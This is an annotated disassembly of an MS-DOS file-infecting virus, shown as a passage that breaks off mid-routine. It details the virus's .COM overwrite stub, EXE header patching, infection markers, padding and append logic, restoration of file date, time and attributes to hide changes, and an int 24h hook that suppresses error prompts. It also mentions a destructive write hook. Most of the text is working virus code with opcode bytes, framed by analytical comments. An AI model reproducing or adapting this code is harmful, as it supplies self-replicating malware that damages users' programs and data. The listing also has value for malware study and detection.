seg_a	segment	byte public
	assume	cs:seg_a, ds:seg_a
	org	100h
;	Head of an infected .COM file: the 20h-byte stub the virus writes
;	over the victim's first bytes (the originals are kept at d_04F7 and
;	restored by l_0000 before the victim runs).
;	In:  ES = PSP segment (a .COM program's ES on entry)
;	Out: far jump through d_010C = (ES + 0138h):0000 -> l_0000
;	Note: 0138h paragraphs = 1380h bytes, the 'org 1380h' of the virus
;	body below; the segment word is patched at run time, so the stub
;	itself is position independent.
start:	mov	ax,es						;0100 8C C0
	add	word ptr cs:[d_010C+2],ax ;segment relocation	;0102 2E: 01 06 010E
	jmp	dword ptr cs:[d_010C]	  ;jump into virus code	;0107 2E: FF 2E 010C
d_010C	dw	0000,0138h		;dword=entry into virus	;010C 0000 0138
				;<- duplicated code (aligning to 20h bytes)
				;   these 16 filler bytes are the opening bytes of
				;   s_15FE, which follow d_027C in the virus image
				;   (the stub is written as one 20h-byte block from d_026E)
	db	0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h	;0110 B8 08 00 8E C0 8B 0E 41
	db	003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh	;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
;	victim code
;..............................................................
	org	1380h
;============================================================================
;	Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
;	COM virus Entry
;	(this code is present only in case *.COM infection)
;----------------------------------------------------------------
;	.COM entry (offset 0 of the virus segment).  Restores the 20h saved
;	victim bytes to PSP:100h, marks the run as a COM infection and jumps
;	to the common entry l_18CF.
;	In:  CS = virus segment (PSP + 0138h), DS = ES = PSP
;	Out: never returns; jumps to l_18CF with DS restored to the PSP
;	Clobbers: AX, CX, SI, DI
;	Note: every cs:[nnn] offset in the virus is relative to the virus
;	segment; listing address = 1380h + offset (cs:[4F7h] is d_04F7 at
;	1877h, cs:[349h] is d_0349 at 16C9h, cs:[54Fh] is l_18CF at 18CFh).
l_0000:	push	ds						;1380 1E
	push	cs						;1381 0E
	pop	ds						;1382 1F
	lea	si,cs:[4F7h]		;d_1877 = saved bytes	;1383 8D 36 04F7
	mov	di,100h						;1387.BF 0100
	mov	cx,20h						;138A B9 0020
	rep	movsb			;restore victim bytes	;138D F3/ A4
	mov	byte ptr cs:[349h],0FFh	;d_16C9	(0FFh = COM)	;138F 2E: C6 06 0349 FF
	nop							;1395 90
	pop	ds						;1396 1F
	lea	ax,cs:[54Fh]		;l_18CF			;1397 8D 06 054F
	jmp	ax						;139B FF E0
				;<--- duplicated fields d_033F - d_0347
				;     (work-area copy carried in the COM image so that
				;     the file-type independent code starts at offset 28h)
	dw	0020						;139D 20 00
	dw	05EAh						;139F EA 05
	dw	0Bh						;13A1 0B 00
	dw	28h						;13A3 28 00
	dw	200h						;13A5 00 02
	db	0						;13A7 00
;===========================================================================
;	Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
;	Get/Set victim attribute
;----------------------------------------------------------------
;	Get/set the attributes of the victim named at d_057F (DOS AH=43h).
;	In:  AL = 0 get / 1 set; CX = new attribute when AL = 1
;	     DS = virus segment (the path is addressed through DS)
;	Out: CF set on error; CX = current attribute when AL = 0
;	Clobbers: AH, DX
s_13A8	proc	near
	mov	dx,offset ds:[57Fh]	;file name		;13A8.BA 057F
	mov	ah,43h			;get/set file attrb	;13AB B4 43
	int	21h						;13AD CD 21
	retn							;13AF C3
s_13A8	endp
;================================================================
;	Move file ptr to EOF
;----------------------------------------------------------------
;	Seek to end of file (DOS AH=42h, AL=2, offset CX:DX = 0).
;	In:  handle in d_009B (read through CS)
;	Out: DX:AX = file size (new file position); CF set on error
;	Clobbers: BX, CX
s_13B0	proc	near
	xor	cx,cx						;13B0 33 C9
	xor	dx,dx						;13B2 33 D2
	mov	ax,4202h	;move file ptr EOF+offset	;13B4 B8 4202
	mov	bx,cs:[9Bh]	;l_141B = file handle		;13B7 2E: 8B 1E 009B
	int	21h						;13BC CD 21
	retn							;13BE C3
s_13B0	endp
;================================================================
;	Read 32 bytes into buffer
;----------------------------------------------------------------
;	Read the first 20h bytes of the open victim into d_04F7 (DOS AH=3Fh).
;	In:  handle in d_009B; DS = virus segment (buffer at DS:4F7h)
;	Out: AX = CX = bytes read; CF set on error
;	Clobbers: AH, BX, DX
s_13BF	proc	near
	mov	cx,20h						;13BF B9 0020
	mov	dx,4F7h			;l_1877-sav victim bytes;13C2.BA 04F7
	mov	bx,cs:[9Bh]		;l_141B = file handle	;13C5 2E: 8B 1E 009B
	mov	ah,3Fh			;read file		;13CA B4 3F
	int	21h						;13CC CD 21
	mov	cx,ax			;bytes read		;13CE 8B C8
	retn							;13D0 C3
s_13BF	endp
;================================================================
;	Write 32 B into file
;----------------------------------------------------------------
;	Write the 20h-byte buffer d_04F7 to the open victim (DOS AH=40h).
;	In:  handle in d_009B; DS = virus segment
;	Out: AX = CX = bytes written; CF set on error
;	Clobbers: ES (left = 8), AH, BX, DX
;	Note: ES = 8 is the virus's own marker: the resident write hook
;	s_1727 compares ES with 8 and skips its buffer-shifting payload, so
;	the virus's own file writes pass through intact.
s_13D1	proc	near
	mov	ax,8			;switch off destruction	;13D1 B8 0008
	mov	es,ax						;13D4 8E C0
	mov	cx,20h						;13D6 B9 0020
	mov	dx,offset ds:[4F7h]	;l_1877 - saved bytes	;13D9.BA 04F7
	mov	bx,cs:[9Bh]		;l_141B = file handle	;13DC 2E: 8B 1E 009B
	mov	ah,40h			;write file cx=bytes	;13E1 B4 40
	int	21h						;13E3 CD 21
	mov	cx,ax						;13E5 8B C8
	retn							;13E7 C3
s_13D1	endp
;================================================================
;	Calculate virus length
;----------------------------------------------------------------
;	d_0341 := 612h - 28h = 5EAh, the length of the file-type independent
;	part of the virus (offset 28h = s_13A8 up to d_0612, the image end).
;	In:  DS = virus segment
;	Out: AX = 5EAh stored at d_0341
;	Clobbers: DX
s_13E8	proc	near
	mov	ax,612h			;virus code length	;13E8 B8 0612
	mov	dx,28h			;file type depended code;13EB BA 0028
	sub	ax,dx						;13EE 2B C2
	mov	ds:[341h],ax		;l_16C1	const vcode len	;13F0 A3 0341
	retn							;13F3 C3
s_13E8	endp
;================================================================
;	Get/Set file date & time
;----------------------------------------------------------------
;	Get/set the open victim's date and time (DOS AH=57h).
;	In:  AL = 0 get / 1 set; for set CX = time, DX = date; handle in d_009B
;	Out: for get CX = time, DX = date; CF set on error
;	Clobbers: AH, BX
;	Used to put the original timestamp back after infection so the file
;	does not look modified.
s_13F4	proc	near
	mov	bx,ds:[9Bh]		;l_141B = file handle	;13F4 8B 1E 009B
	mov	ah,57h		;get/set file date & time	;13F8 B4 57
	int	21h						;13FA CD 21
	retn							;13FC C3
s_13F4	endp
;================================================================
;	Contaminate file - master routine
;----------------------------------------------------------------
;	Infection master routine, reached from the AH=4Bh (load & execute)
;	hook s_1769.
;	In:  DS = virus segment; d_057F holds the path of the program being
;	     executed (copied there by s_1769); int 24h is already hooked.
;	Out: nothing; the file is patched in place when all checks pass.
;	Flow: save + clear attributes -> open read/write -> save date/time
;	      -> read first 20h bytes into d_04F7 -> 'MZ' ? l_146F (EXE)
;	      : l_1616 (COM) -> l_15A8 (restore date/time, close, restore
;	      attributes).  The two early jc's exit via l_146A -> l_15C6
;	      (plain retn) because no handle is open yet.
;	Clobbers: AX, BX, CX, DX, ES and whatever the called routines clobber.
s_13FD	proc	near
	mov	byte ptr ds:[349h],0	;d_16C9	(000h = EXE)	;13FD C6 06 0349 00
	nop							;1402 90
	mov	al,0						;1403 B0 00
	call	s_13A8			;Get victim attribute	;1405 E8 FFA0
	jc	l_146A			;-> EXIT		;1408 72 60
	mov	ds:[33Fh],cx		;l_16BF orig. file attr	;140A 89 0E 033F
				;20h = archive only: clears read-only,
				;hidden and system so the open below succeeds
	mov	cx,20h						;140E B9 0020
	mov	al,1						;1411 B0 01
	call	s_13A8			;Set victim attribute	;1413 E8 FF92
	jc	l_146A			;-> EXIT		;1416 72 52
	jmp	short l_1421					;1418 EB 07
	nop							;141A 90
				;<- data embedded in the code stream, skipped
				;   by the jmp above
d_009B	dw	0005h			;file handle		;141B 05 00
d_009D	dw	0400h			;written at 142F, not read elsewhere in this listing;141D 00 04
d_009F	dw	057Fh			;filepath address	;141F 7F 05
l_1421:	mov	word ptr cs:[9Fh],057Fh	;l_141F	:= offset l_18FF;1421 2E C7 06 9F 00 7F 05
	mov	dx,ds:[9Fh]		;l_141F	- file name	;1428 8B 16 009F
	mov	ax,400h						;142C B8 0400
	mov	ds:[9Dh],ax		;l_141D			;142F A3 009D
	mov	al,2			;2 = read/write access	;1432 B0 02
	mov	ah,3Dh			;open file, al=mode	;1434 B4 3D
	int	21h						;1436 CD 21
				;d_009B is pre-set to FFFFh so a failed open
				;is detected by the compare at l_1443
	mov	word ptr ds:[9Bh],0FFFFh  ;l_141B = file handle	;1438 C7 06 009B FFFF
	jc	l_1443						;143E 72 03
	mov	ds:[9Bh],ax		;l_141B = file handle	;1440 A3 009B
l_1443:	mov	ax,ds:[9Bh]		;l_141B = file handle	;1443 A1 009B
	cmp	ax,0FFFFh					;1446 3D FFFF
	je	l_146A			;-> EXIT, open file err	;1449 74 1F
	mov	al,0						;144B B0 00
	call	s_13F4			;Get file date & time	;144D E8 FFA4
	jc	l_148F			;-> err, close & exit	;1450 72 3D
	mov	ds:[0E8h],dx		;l_1468 = date		;1452 89 16 00E8
	mov	ds:[0EDh],cx		;l_146D = time		;1456 89 0E 00ED
	call	s_13BF			;Read 32 B into buffer	;145A E8 FF62
	mov	ax,word ptr ds:[4F7h]	;l_1877 first file word	;145D A1 04F7
	cmp	ax,5A4Dh		;'MZ' ?			;1460 3D 5A4D
	je	l_146F			;-> yes, EXE		;1463 74 0A
	jmp	l_1616			;-> no, COM		;1465 E9 01AE
				;<- more data embedded in the code stream
d_00E8	dw	0EF8h			;victim date		;1468 F8 0E
l_146A:	jmp	l_15C6						;146A E9 0159
d_00ED	dw	0001h			;victim time		;146D 01 00
;================================================================
;	EXE file contamination
;----------------------------------------------------------------
;	EXE infection.  Works on the 20h-byte header copy at d_04F7; the
;	MZ fields used are (buffer offset in brackets):
;	  +02h [4F9h] bytes in last page   +04h [4FBh] pages in file
;	  +08h [4FFh] header paragraphs    +0Eh [505h] initial SS
;	  +10h [507h] initial SP           +12h [509h] checksum
;	  +14h [50Bh] initial IP           +16h [50Dh] initial CS
;	  +1Ch [513h] header word not used by the loader (author: "?")
;	Infection marker: checksum == -(bytes in last page).
;	Layout written: [padding to a paragraph][virus 28h..612h] appended at
;	EOF; CS = paragraph of the appended image so that the virus's own
;	offsets are valid; entry l_18CF (54Fh).  When the padding is >= 3
;	bytes a 'jmp l_18CF' (d_054C) is placed in it and IP points there.
;	In:  DS = virus segment, file open, first 20h bytes read
;	Out: falls into l_15A8 (close + restore); jumps to l_148F/l_15A8 on
;	     "already infected", "too small" or write error
l_146F:	mov	ax,word ptr ds:[509h]	;+12h = negative sum	;146F A1 0509
	neg	ax						;1472 F7 D8
	cmp	ax,word ptr ds:[4F9h]	;+2 = last page bytes	;1474 3B 06 04F9
	je	l_148F			;-> already infected	;1478 74 15
	mov	ax,word ptr ds:[4FBh]	;+4 = pages in file	;147A A1 04FB
	cmp	ax,3						;147D 3D 0003
	jb	l_148F			;-> file too small (<3 pages);1480 72 0D
	mov	ax,word ptr ds:[4FFh]	;+8 = size of hdr (para);1482 A1 04FF
	mov	cl,4						;1485 B1 04
	shl	ax,cl			;paragraphs -> bytes	;1487 D3 E0
	mov	ds:[347h],ax		;l_16C7	= size of header;1489 A3 0347
	jmp	short l_1492					;148C EB 04
	nop							;148E 90
l_148F:	jmp	l_15A8						;148F E9 0116
l_1492:	mov	ax,word ptr ds:[50Bh]	;+14h = IP		;1492 A1 050B
	mov	word ptr ds:[5B4h],ax	;l_1934 = saved victim IP;1495 A3 05B4
				;IP is set to 28h (offset of s_13A8) here and
				;used as a constant in the comparisons below;
				;the final IP is stored again at 156A/157C
	mov	word ptr ds:[50Bh],28h	;new IP value (l_13A8)	;1498 C7 06 050B 0028
	call	s_13B0			;Move file ptr to EOF	;149E E8 FF0F
	push	ax			;keep DX:AX = file size	;14A1 50
	push	dx						;14A2 52
	sub	ax,ds:[347h]		;l_16C7=size of header	;14A3 2B 06 0347
	sbb	dx,0						;14A7 83 DA 00
				;load-module length kept as a dword with the
				;HIGH word first: d_0437 = high, d_0439 = low
	mov	word ptr ds:[439h],ax	;l_17B9			;14AA A3 0439
	mov	word ptr ds:[437h],dx	;l_17B7			;14AD 89 16 0437
	cmp	dx,0						;14B1 83 FA 00
	ja	l_14D3			;-> more than 64KB	;14B4 77 1D
	cmp	ax,word ptr ds:[50Bh]	;+14h = IP		;14B6 3B 06 050B
	ja	l_14D3			;-> more than 28h length;14BA 77 17
					;<- EXE code length =< 28h
					;   the virus image starts at paragraph 0
					;   and is padded out to offset 28h
	mov	word ptr ds:[345h],0	;l_16C5			;14BC C7 06 0345 0000
	mov	bx,word ptr ds:[50Bh]				;14C2 8B 1E 050B
	sub	bx,ax			;28h - file length	;14C6 2B D8
	mov	ds:[343h],bx		;l_16C3	- aligning bytes;14C8 89 1E 0343
	mov	ds:[513h],bx		;+1Ch = ?		;14CC 89 1E 0513
	jmp	short l_1511					;14D0 EB 3F
	nop							;14D2 90
				;<- normal case: d_0345 = (len - 28h) / 16,
				;   rounded up, so that virus offset 28h lands
				;   on the first byte after the padding
l_14D3:	sub	ax,word ptr ds:[50Bh]	;+14h = IP=28h		;14D3 2B 06 050B
	sbb	dx,0						;14D7 83 DA 00
	mov	ds:[345h],ax		;d_16C5			;14DA A3 0345
	and	ax,0Fh						;14DD 25 000F
	cmp	ax,0						;14E0 3D 0000
	jne	l_14F9			;-> need alignment	;14E3 75 14
	mov	word ptr ds:[343h],0	;d_16C3	- aligning bytes;14E5 C7 06 0343 0000
	mov	ax,ds:[345h]		;d_16C5			;14EB A1 0345
	mov	cx,10h						;14EE B9 0010
	div	cx			;DX:AX / 16 (DX = high word from the sbb);14F1 F7 F1
	mov	ds:[345h],ax		;d_16C5	- segment of vir;14F3 A3 0345
	jmp	short l_1511					;14F6 EB 19
	db	90h						;14F8 90
				;<---- need alignment
l_14F9:	mov	word ptr ds:[343h],10h	;d_16C3	- aligning bytes;14F9 C7 06 0343 0010
	sub	ds:[343h],ax		;d_16C3	= 16 - (len & 0Fh);14FF 29 06 0343
	mov	ax,ds:[345h]		;d_16C5			;1503 A1 0345
	mov	cx,10h						;1506 B9 0010
	div	cx						;1509 F7 F1
	add	ax,1			;+ alignment paragraph	;150B 05 0001
	mov	ds:[345h],ax		;d_16C5	- segment of vir;150E A3 0345
				;<- swap the header's CS/SS/SP with the virus's
				;   own; the originals go to d_05B6/d_05A1/d_05A3
				;   and are put back by l_1953 at run time
l_1511:	mov	ax,word ptr ds:[50Dh]	;+ 16h = CS		;1511 A1 050D
	mov	word ptr ds:[5B6h],ax	;d_1936 - victim CS	;1514 A3 05B6
	mov	ax,ds:[345h]		;d_16C5			;1517 A1 0345
	mov	word ptr ds:[50Dh],ax	;+ 16h = CS		;151A A3 050D
	push	ax			;keep virus paragraph across the SS save;151D 50
	mov	ax,word ptr ds:[505h]	;+ 0Eh = SS		;151E A1 0505
	mov	word ptr ds:[5A1h],ax	;d_1921 - victim SS	;1521 A3 05A1
	pop	ax						;1524 58
	mov	word ptr ds:[505h],ax	;+ 0Eh = virus SS	;1525 A3 0505
	mov	ax,word ptr ds:[507h]	;+ 10h = SP		;1528 A1 0507
	mov	word ptr ds:[5A3h],ax	;d_1923 victim SP	;152B A3 05A3
				;virus SP = just past the end of its own image
	lea	ax,cs:[612h]		;End of virus		;152E 8D 06 0612
	add	ax,1Eh			;virus stack		;1532 05 001E
	add	ax,ds:[343h]		;d_16C3	- aligning bytes;1535 03 06 0343
	mov	word ptr ds:[507h],ax	;virus SP		;1539 A3 0507
	call	s_13E8			;Calculate virus length	;153C E8 FEA9
				;new file size = old size + const part + padding,
				;then split into 512-byte pages + remainder
	pop	dx			;<- victim EOF		;153F 5A
	pop	ax						;1540 58
	add	ax,ds:[341h]		;l_16C1	const vcode len	;1541 03 06 0341
	adc	dx,0						;1545 83 D2 00
	add	ax,ds:[343h]		;d_16C3	- aligning bytes;1548 03 06 0343
	adc	dx,0						;154C 83 D2 00
	mov	cx,200h			;page length		;154F B9 0200
	div	cx			;AX = pages, DX = bytes in last page;1552 F7 F1
	cmp	dx,0						;1554 83 FA 00
	je	l_155A						;1557 74 01
	inc	ax			;partial last page counts;1559 40
l_155A:	mov	word ptr ds:[4FBh],ax	;+4 - file len in pages	;155A A3 04FB
	mov	word ptr ds:[4F9h],dx	;+2 - last page length	;155D 89 16 04F9
				;checksum := -(last page length) = the marker
				;tested at l_146F on the next encounter
	neg	dx						;1561 F7 DA
	mov	word ptr ds:[509h],dx	;+12h = negative sum	;1563 89 16 0509
	mov	cx,54Fh			;offset l_18CF-EXE entry;1567 B9 054F
	mov	word ptr ds:[50Bh],cx	;+14h - virus IP	;156A 89 0E 050B
	cmp	word ptr ds:[343h],3	;d_16C3	- aligning bytes;156E 83 3E 0343 03
	jb	l_1580						;1573 72 0B
					;<- file begins with jump
					;   IP = 28h - padding: the padding written by
					;   s_15C7 starts with E9 (jmp) + d_054C, so
					;   entry lands on that jmp instead of l_18CF
	mov	cx,28h						;1575 B9 0028
	sub	cx,ds:[343h]		;d_16C3	- aligning bytes;1578 2B 0E 0343
	mov	word ptr ds:[50Bh],cx				;157C 89 0E 050B
l_1580:	call	s_15DF			;Set file pointer to BOF;1580 E8 005C
	call	s_13D1			;Write 32 B into file	;1583 E8 FE4B
	jc	l_15A8			;-> error, EXIT		;1586 72 20
				;jmp displacement is taken from the end of the
				;3-byte jmp: (padding - 3) + (54Fh - 28h), which
				;lands exactly on l_18CF from IP = 28h - padding
	mov	cx,ds:[343h]		;d_16C3	- aligning bytes;1588 8B 0E 0343
	sub	cx,3			;jmp instruction length	;158C 83 E9 03
	mov	ax,54Fh			;offset l_18CF=EXE entry;158F B8 054F
	mov	bx,28h			;beginning of code	;1592 BB 0028
	sub	ax,bx			;jmp distance		;1595 2B C3
	add	cx,ax			;aligning bytes		;1597 03 C8
	mov	word ptr ds:[54Ch],cx	;l_18CC	= jump distance	;1599 89 0E 054C
	call	s_13B0			;Move file ptr to EOF	;159D E8 FE10
	call	s_15C7			;Align EOF to paragraphs;15A0 E8 0024
	jc	l_15A8			;-> error, EXIT		;15A3 72 03
	call	s_15FE			;Write const part of vir;15A5 E8 0056
;================================================================
;	End of contamination (common to EXE & COM)
;----------------------------------------------------------------
;	Common exit of the infection routine: put the original date/time
;	back, close the handle, restore the original attributes.
;	In:  DS = virus segment; d_00E8/d_00ED = saved date/time,
;	     d_033F = saved attributes, d_009B = handle
;	Out: nothing; errors of the three calls are not checked
;	Clobbers: AX, BX, CX, DX
;	Note: the double 'ds:ds:' override on the two loads is a redundant
;	prefix in the listing, not a different addressing mode.
l_15A8:	mov	al,1			;to set			;15A8 B0 01
	mov	dx,ds:ds:[0E8h]		;d_1468	victim date	;15AA 8B 16 00E8
	mov	cx,ds:ds:[0EDh]		;d_146D	victim time	;15AE 8B 0E 00ED
	call	s_13F4			;Set file date & time	;15B2 E8 FE3F
	mov	bx,ds:[9Bh]		;l_141B = file handle	;15B5 8B 1E 009B
	mov	ah,3Eh			;close file		;15B9 B4 3E
	int	21h						;15BB CD 21
	mov	al,1			;to set			;15BD B0 01
	mov	cx,ds:[33Fh]		;l_16BF orig. file attr	;15BF 8B 0E 033F
	call	s_13A8			;Set victim attribute	;15C3 E8 FDE2
l_15C6:	retn							;15C6 C3
;================================================================
;	Align end of file to paragraphs
;----------------------------------------------------------------
;	Write the paragraph-alignment padding at the current file position.
;	The padding is d_0343 bytes taken from 54Bh, i.e. the 'E9 <d_054C> 00'
;	jmp pattern followed by whatever lies after it, so a padding of >= 3
;	bytes starts with a usable jmp (see l_1580).
;	In:  DS = virus segment; d_0343 = byte count; handle in d_009B
;	Out: AX = CX = bytes written; CF set on error; ES left = 8
;	Clobbers: AH, BX, DX
;	Note: d_0343 may be 0; DOS AH=40h with CX = 0 truncates at the
;	current position, which at EOF is a no-op.
s_15C7:	mov	ax,8			;to switch off virus	;15C7 B8 0008
	mov	es,ax						;15CA 8E C0
	mov	cx,ds:[343h]		;l_16C3	- aligning bytes;15CC 8B 0E 0343
	mov	dx,54Bh			;offset d_18CB		;15D0.BA 054B
	mov	bx,cs:[9Bh]		;l_141B = file handle	;15D3 2E: 8B 1E 009B
	mov	ah,40h			;write file		;15D8 B4 40
	int	21h						;15DA CD 21
	mov	cx,ax						;15DC 8B C8
	retn							;15DE C3
;================================================================
;	Set file pointer to BOF
;----------------------------------------------------------------
;	Seek to beginning of file (DOS AH=42h, AL=0, offset CX:DX = 0).
;	In:  handle in d_009B (read through CS)
;	Out: DX:AX = 0 (new position); CF set on error
;	Clobbers: BX, CX
s_15DF:	xor	cx,cx						;15DF 33 C9
	xor	dx,dx						;15E1 33 D2
	mov	ax,4200h	;move file ptr, cx,dx=offset	;15E3 B8 4200
	mov	bx,cs:[9Bh]	;l_141B = file handle		;15E6 2E: 8B 1E 009B
	int	21h						;15EB CD 21
	retn							;15ED C3
;================================================================
;	COM virus start code pattern
;----------------------------------------------------------------
;	Template of the 20h-byte stub written over a .COM victim's first bytes
;	(identical to 'start' at the top of this listing).  Only d_027C, the
;	paragraph of the appended virus relative to the PSP, is filled in by
;	l_1616 before the stub is written; d_027A stays 0 (= l_0000).
;	The 20h-byte write starts here and runs into the first 16 bytes of
;	s_15FE, which is why those bytes also appear after d_010C in the
;	infected head.
d_026E:	mov	ax,es						;15EE 8C C0
	add	word ptr cs:[010Ch+2],ax			;15F0 2E: 01 06 010E
	jmp	dword ptr cs:[010Ch]				;15F5 2E: FF 2E 010C
d_027A	dw	0						;15FA 00 00
d_027C	dw	0138h						;15FC 38 01
;================================================================
;	Write constant part of virus
;----------------------------------------------------------------
;	Append the file-type independent part of the virus (offset 28h up to
;	d_0612, d_0341 = 5EAh bytes) at the current file position.
;	In:  DS = virus segment; d_0341 set by s_13E8; handle in d_009B
;	Out: AX = CX = bytes written; CF set on error; ES left = 8
;	Clobbers: AH, BX, DX
;	Note: the first 16 bytes of this routine double as stub filler
;	(see d_026E).
s_15FE:	mov	ax,8			;switch off virus	;15FE B8 0008
	mov	es,ax						;1601 8E C0
	mov	cx,ds:[341h]		;l_16C1	const.code leng.;1603 8B 0E 0341
	mov	dx,28h			;offset l_13A8 - vircode;1607.BA 0028
	mov	bx,cs:[9Bh]		;l_141B = file handle	;160A 2E: 8B 1E 009B
	mov	ah,40h			;write file		;160F B4 40
	int	21h						;1611 CD 21
	mov	cx,ax						;1613 8B C8
	retn							;1615 C3
;================================================================
;	COM victim contamination
;----------------------------------------------------------------
;	COM infection.
;	Marker: the word at file offset 2 equals 012Eh, i.e. the '2E 01'
;	bytes of the stub's 'add word ptr cs:[...]' (see d_026E).
;	Files shorter than 3E8h bytes or that would exceed 64KB after
;	padding are left alone.
;	Layout written: [stub at offset 0][original file][padding to a
;	paragraph][d_0322 28h bytes: COM entry + work area][virus 28h..612h];
;	d_027C = (100h + size + padding) / 16 = paragraph of the appended
;	image relative to the PSP, entry l_0000 at offset 0.
;	In:  DS = virus segment, file open, first 20h bytes in d_04F7
;	Out: jumps to l_15A8 (close + restore)
;	Note: unlike the EXE path, none of the write results are checked.
l_1616:	cmp	word ptr ds:[4F9h],12Eh	;BOF+2			;1616 81 3E 04F9 012E
	je	l_15A8			;-> already infected, EXIT;161C 74 8A
	call	s_13B0			;Move file ptr to EOF	;161E E8 FD8F
	cmp	ax,3E8h			;1000 byte file length	;1621 3D 03E8
	jb	l_169F			;-> below, EXIT		;1624 72 79
				;100h = load offset of a .COM image; AX now
				;holds the in-memory offset of the file's end
	add	ax,100h			;add PSP		;1626 05 0100
	adc	dx,0						;1629 83 D2 00
	push	ax						;162C 50
	and	ax,0Fh						;162D 25 000F
	mov	word ptr ds:[343h],0	;l_16C3	aligning bytes	;1630 C7 06 0343 0000
	cmp	ax,0						;1636 3D 0000
	je	l_1645			;-> para aligned file	;1639 74 0A
	mov	word ptr ds:[343h],10h	;l_16C3	- aligning bytes;163B C7 06 0343 0010
	sub	ds:[343h],ax		;l_16C3	= 16 - (end & 0Fh);1641 29 06 0343
l_1645:	pop	ax						;1645 58
	add	ax,ds:[343h]		;l_16C3	aligning bytes	;1646 03 06 0343
	adc	dx,0						;164A 83 D2 00
	cmp	dx,0						;164D 83 FA 00
	ja	l_169F			;-> file too big, EXIT	;1650 77 4D
	mov	cl,4						;1652 B1 04
	shr	ax,cl			;bytes 2 paragraphs	;1654 D3 E8
				;the compare below sets flags that nothing
				;consumes before the next instruction clobbers
				;them (no conditional jump follows)
	cmp	word ptr ds:[343h],0	;l_16C3	- aligning bytes;1656 83 3E 0343 00
	mov	ds:[27Ch],ax		;l_15FC	virus segment	;165B A3 027C
	mov	word ptr ds:[27Ah],0	;l_15FA	virus entry	;165E C7 06 027A 0000
	call	s_15DF			;Set file pointer to BOF;1664 E8 FF78
				;ES = 8: own-write marker for the s_1727 hook
	mov	ax,8			;to switch off virus	;1667 B8 0008
	mov	es,ax						;166A 8E C0
	mov	cx,20h			;bytes to write		;166C B9 0020
	mov	dx,26Eh			;offset l_15EE		;166F.BA 026E
	mov	bx,cs:[9Bh]		;l_141B = file handle	;1672 2E: 8B 1E 009B
	mov	ah,40h			;write file		;1677 B4 40
	int	21h						;1679 CD 21
	mov	cx,ax			;bytes written		;167B 8B C8
	call	s_13B0			;Move file ptr to EOF	;167D E8 FD30
	call	s_15C7			;write aligning bytes	;1680  E8 FF44
	mov	ax,8			;switch off virus	;1683  B8 0008
	mov	es,ax						;1686  8E C0
				;28h bytes = d_0322..d_0349: COM entry code plus
				;the work-area words, so the appended image has
				;the same layout as the one running now
	mov	cx,28h			;40 bytes		;1688  B9 0028
	mov	dx,322h			;offset l_16A2		;168B .BA 0322
	mov	bx,cs:[9Bh]		;l_141B = file handle	;168E  2E: 8B 1E 009B
	mov	ah,40h			;write file		;1693  B4 40
	int	21h						;1695  CD 21
	mov	cx,ax			;bytes written		;1697 8B C8
	call	s_13E8			;Calculate virus length	;1699 E8 FD4C
	call	s_15FE			;Write const part of vir;169C  E8 FF5F
l_169F:	jmp	l_15A8			;close files, EXIT	;169F  E9 FF06
s_13FD	endp
				;<-- COM type virus begin pattern
;	COM-entry pattern as it is written into the victim (byte-for-byte the
;	same code as l_0000), immediately followed by the work area so that
;	the 28h bytes from d_0322 to d_0349 form the file-type dependent head
;	of a COM-type image.  The copy at l_0000 is the one that executes.
d_0322:	push	ds						;16A2 1E
	push	cs						;16A3 0E
	pop	ds						;16A4 1F
	lea	si,cs:[4F7h]					;16A5 8D 36 04F7
	mov	di,0100h					;16A9.BF 0100
	mov	cx,20h						;16AC B9 0020
	rep	movsb						;16AF F3/ A4
	mov	byte ptr cs:[349h],0FFh	;d_16C9	(0FFh = COM)	;16B1 2E: C6 06 0349 FF
	nop							;16B7 90
	pop	ds						;16B8 1F
	lea	ax,cs:[54Fh]					;16B9 8D 06 054F
	jmp	ax						;16BD FF E0
;------ work area (values shown are those of this sample)
d_033F	dw	0020h			;orig. file attr (saved by s_13FD);16BF 20 00
d_0341	dw	05EAh			;const virus code length (set by s_13E8);16C1 EA 05
d_0343	dw	0Bh			;aligning bytes		;16C3 0B 00
d_0345	dw	28h			;paragraph of virus in EXE load module;16C5 28 00
d_0347	dw	200h			;size of header		;16C7 00 02
d_0349	db	0			;0=EXE, 0FFh=COM	;16C9 00
;================================================================
;	init registers
;----------------------------------------------------------------
;	Zero SI, DI, AX, DX, BP before control is handed to the victim
;	(called from l_18E5 and l_1953 right before the far jump).
;	In:  none
;	Out: SI = DI = AX = DX = BP = 0
s_16CA	proc	near
	xor	si,si						;16CA 33 F6
	xor	di,di						;16CC 33 FF
	xor	ax,ax						;16CE 33 C0
	xor	dx,dx						;16D0 33 D2
	xor	bp,bp						;16D2 33 ED
	retn							;16D4 C3
s_16CA	endp
;================================================================
;	int 24h handling routine (infection time active only)
;----------------------------------------------------------------
;	Critical-error (int 24h) handler installed by s_16E6 for the
;	duration of an infection.  DOS passes the error code in DI.
;	DI = 0 (the first error code) is answered with AL = 3, which in the
;	int 24h convention means "fail the call" (the original comment says
;	"ignore", but ignore would be AL = 0); any other code is chained to
;	the saved vector in d_0362.  Net effect: no "Abort, Retry, Fail?"
;	prompt for e.g. a write-protected disk while infecting.
l_16D5:	cmp	di,0						;16D5 83 FF 00
	jne	l_16DD						;16D8 75 03
	mov	al,3			;ignore			;16DA B0 03
	iret							;16DC CF
l_16DD:	jmp	dword ptr cs:[362h]	;L_16E2 = old int 24h	;16DD 2E: FF 2E 0362
d_0362	dw	0556h,0DF0h		;saved int 24h offset,segment;16E2 56 05 F0 0D
;================================================================
;	Get int 24h
;----------------------------------------------------------------
;	Hook int 24h: save the vector (IVT entry at 0000:0090h) into d_0362
;	and point it at l_16D5 (offset 355h) in the virus segment.
;	In:  AX = virus code segment (s_1769 loads CS into AX before calling)
;	Out: ES = 0; d_0362 = old vector
;	Clobbers: BX, flags (interrupts disabled during the swap)
s_16E6	proc	near
	cli		; Disable interrupts			;16E6 FA
	xor	bx,bx						;16E7 33 DB
	mov	es,bx						;16E9 8E C3
	mov	bx,es:[90h]		;int 24h offset		;16EB 26: 8B 1E 0090
	mov	word ptr cs:[362h],bx	;l_16E2			;16F0 2E: 89 1E 0362
	mov	bx,es:[92h]		;int 24h segment	;16F5 26: 8B 1E 0092
	mov	word ptr cs:[362h+2],bx	;L_16E2+2		;16FA 2E: 89 1E 0364
